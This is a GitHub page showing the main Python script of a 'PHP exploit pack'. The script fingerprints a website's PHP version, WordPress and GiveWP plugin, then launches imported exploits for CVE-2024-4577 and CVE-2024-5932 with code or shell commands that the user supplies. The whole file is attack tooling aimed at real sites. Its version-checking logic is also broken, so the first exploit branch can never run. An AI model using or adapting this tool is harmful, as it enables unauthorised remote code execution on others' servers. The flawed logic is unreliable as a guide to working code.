PHPexploit_pack/main.py at main · tk-1001/PHPexploit_pack · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85

import sys

from detection_functions import is_php_used, php_version_from_header, detect_wordpress_used, \
    is_givewp_present

import argparse

# Exploits
from cve20244577 import exploit_CVE20244577
from CVE20245932rce import exploit_CVE20245932rce


debug = True

def run_right_exploit(php_version, target):
    php_version_list = php_version.split('.')
    tmp_list = []
    for item in php_version_list:
        tmp_list.append(int(item))
    php_version_list = tmp_list
    # print(php_version_list)

    if php_version_list[0] == 8:
        if  php_version_list[1] == 1 and php_version_list[2] < 29:
            if php_version_list[1] == 2 and php_version_list[2] < 20:
                if php_version_list[1] == 3 and php_version_list[2] < 8:
                    print("[+] CVE-2024-4577 exploit if system runs on windows with japanese or chinese locale")
                    php_file_path = input("Give file path for php to be run: ")
                    with open(php_file_path, "r") as php_file:
                        php_content = php_file.read()
                    exploit_CVE20244577(target ,php_content)

    if detect_wordpress_used(target):
        print("[+] WordPress is used on this website.")
        target_updated = input("Give full url for givewp plugin form: ")
        if is_givewp_present(target_updated):
            print("[+] GiveWP plugin is present on this website.")
            command_to_run = input("Command to run: ")
            exploit_CVE20245932rce(target_updated, command_to_run)

def main_function(website_url):
    if not website_url.startswith(('http://', 'https://')):
        website_url = 'http://' + website_url


    if not is_php_used(website_url):
        sys.exit()

    php_version = php_version_from_header(website_url)
    # system_os = detect_os(website_url)
    if debug:
        # print(system_os)
        print(php_version)

    if php_version is None:
        print("[-] PHP version could not be detected.")
        sys.exit()


    run_right_exploit(php_version, website_url)


    # selected_exploit = get_right_exploit(php_version)

    # execute_exploit(website_url, selected_exploit)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PHP Version Detection and Exploit Selection")

    parser.add_argument("-u", "--url", required=True, help="Target URL to detect PHP version")
    parser.add_argument('--code', '-c', dest='code', help='php code to execute', required=False)

    args = parser.parse_args()

    if debug:
        print(args)
    main_function(args.url)